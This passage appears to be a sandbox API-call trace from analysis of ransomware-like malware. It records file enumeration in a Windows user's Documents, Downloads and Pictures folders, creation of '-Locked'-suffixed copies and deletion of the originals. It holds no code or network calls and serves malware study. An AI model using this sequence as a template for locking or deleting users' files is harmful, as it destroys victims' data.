ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b4c5d8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx-Locked-Locked-Locked", cAlternateFileName="MIKC8R~2.PPT")) returned 1 [0305.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b5c42f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b5c42f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b5c42f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx-Locked-Locked-Locked", cAlternateFileName="PPL3T~2.XLS")) returned 1 [0305.876] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b68865, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b68865, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b68865, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", cAlternateFileName="RRSHMO~2.PDF")) returned 1 [0305.876] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.876] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0305.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0305.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0305.876] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0305.876] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0305.876] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.877] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.877] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b0bad5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b0bad5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b0bad5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked", cAlternateFileName="BVTEJK~2.ODS")) returned 1 [0305.877] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b4c5d8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b4c5d8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b4c5d8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx-Locked-Locked-Locked", cAlternateFileName="MIKC8R~2.PPT")) returned 1 [0305.878] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b5c42f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b5c42f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b5c42f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx-Locked-Locked-Locked", cAlternateFileName="PPL3T~2.XLS")) returned 1 [0305.878] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b68865, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b68865, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b68865, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", cAlternateFileName="RRSHMO~2.PDF")) returned 1 [0305.878] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b68865, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b68865, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b68865, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", cAlternateFileName="RRSHMO~2.PDF")) returned 0 [0305.915] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0305.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0305.916] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5e [0305.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0305.916] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.922] GetFileType (hFile=0x49c) returned 0x1 [0305.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0305.922] GetFileType (hFile=0x49c) returned 0x1 [0305.924] CloseHandle (hObject=0x49c) returned 1 [0305.924] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked", lpFilePart=0x0) returned 0x57 [0305.924] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked-locked-locked")) returned 1 [0305.925] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x58 [0305.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0305.925] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.926] GetFileType (hFile=0x49c) returned 0x1 [0305.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0305.926] GetFileType (hFile=0x49c) returned 0x1 [0305.928] CloseHandle (hObject=0x49c) returned 1 [0305.929] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x51 [0305.929] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked-locked-locked")) returned 1 [0305.930] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x53 [0305.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0305.930] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.931] GetFileType (hFile=0x49c) returned 0x1 [0305.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0305.931] GetFileType (hFile=0x49c) returned 0x1 [0305.951] CloseHandle (hObject=0x49c) returned 1 [0305.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0305.952] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked-locked-locked")) returned 1 [0305.953] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x5d [0305.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0305.953] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.954] GetFileType (hFile=0x49c) returned 0x1 [0305.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0305.954] GetFileType (hFile=0x49c) returned 0x1 [0305.956] CloseHandle (hObject=0x49c) returned 1 [0305.956] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x56 [0305.956] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked-locked-locked")) returned 1 [0305.957] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0305.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0305.957] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x36c2da18, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c2da18, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0305.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0305.957] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y")) returned 0 [0305.958] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0305.958] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0305.958] CoTaskMemFree (pv=0x73f0b8) [0305.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.960] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpFilePart=0x0) returned 0x1f [0305.960] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpFilePart=0x0) returned 0x20 [0305.960] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34b9bb1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b9bb1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.961] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34b9bb1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b9bb1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.961] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b7fa82, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b7fa82, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b7fa82, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.961] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.961] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.962] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpFilePart=0x0) returned 0x1f [0305.962] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpFilePart=0x0) returned 0x20 [0305.976] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34b9bb1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b9bb1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.976] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34b9bb1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b9bb1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.977] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b7fa82, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b7fa82, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b7fa82, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.978] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b7fa82, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b7fa82, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b7fa82, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 0 [0305.978] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.979] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x39 [0305.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.979] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.980] GetFileType (hFile=0x49c) returned 0x1 [0305.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.980] GetFileType (hFile=0x49c) returned 0x1 [0305.983] CloseHandle (hObject=0x49c) returned 1 [0305.983] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0305.983] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini-locked")) returned 1 [0305.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.984] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpFilePart=0x0) returned 0x1e [0305.984] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpFilePart=0x0) returned 0x1f [0305.984] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35891147, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ad4761, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.985] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35891147, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ad4761, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.985] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x353db434, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x353db434, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x353db434, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yrCaSxSlfeUmFUe0U.bmp-Locked", cAlternateFileName="-YRCAS~2.BMP")) returned 1 [0305.985] 